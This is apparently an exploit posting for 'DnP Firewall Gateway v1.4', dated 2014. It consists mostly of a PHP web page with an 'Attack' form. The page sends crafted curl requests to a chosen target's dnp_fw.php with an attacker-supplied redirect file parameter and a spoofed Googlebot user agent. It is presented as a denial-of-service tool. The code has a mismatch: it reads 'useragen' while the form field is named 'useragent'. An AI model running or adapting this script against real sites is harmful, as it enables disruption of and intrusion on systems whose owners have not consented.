# Exploit Title: DOS DnP Firewall Gateway v1.4
# Google Dork: DnP Firewall Gateway v1.4
# Date: 05/27/2014
# Exploit Author: E1.Coders
# Homepage: 1cyberteam.Com
# Software Link: -
# Tested on: Windows XP 7 8 LINUX
# CVE : -
<?php
if(isset($_GET['target'])){
$target = $_GET['target'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://".$target."/dnp_fw.php?dnp_firewall_redirect=".$_GET['file']);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_GET['useragen']);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
}
?>
<form action="" method="get" style="background-color:#CCC; padding:3px" >
Site URL : <input name="target" type="text" style="width:200px" /><br />
File name : <input name="file" type="text" style="width:200px"/><br />
Useragent :<input name="useragent" type="text" value="Googlebot" style="width:200px"/><br />
<input name="submit" type="submit" value="Attack" /><br />
</form>
<div><?php if(isset($_GET['target'])){ echo $buf; } ?></div>
Find